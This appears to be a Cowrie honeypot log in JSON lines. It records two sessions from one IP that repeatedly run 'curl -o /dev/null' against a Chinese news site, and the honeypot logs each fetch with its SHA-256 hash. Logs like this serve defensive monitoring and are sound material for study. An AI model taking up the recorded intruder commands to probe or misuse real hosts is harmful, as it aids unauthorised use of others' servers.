{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.470479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.487756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.488888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.512150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.514178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.517920Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.519647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.525593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.530397Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.531359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.549105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.550154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.554123Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.567544Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.571466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.572364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.586062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.586977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.591374Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.594013Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.608737Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.609729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.618711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.620308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.620957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.641162Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.646246Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.647114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.651351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.652943Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.655664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.656518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.685378Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.687201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.688179Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.692036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.692779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.708701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.725916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.726975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.731162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.731977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.744110Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.756716Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.767487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.768349Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.770777Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.771620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.775546Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.785154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.806932Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.808325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.809354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.812501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.813064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.832711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.846106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.853988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.855106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.858306Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.859102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.863256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.872486Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.893960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.895237Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.898782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.899948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.936885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.938202Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.941599Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.954657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.955648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.958951Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:03.990570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.991792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.996681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:03.999400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.002184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.003006Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.010433Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.013295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.028340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.029266Z","src_ip":"212.227.125.160","session":"7541ed730449"}
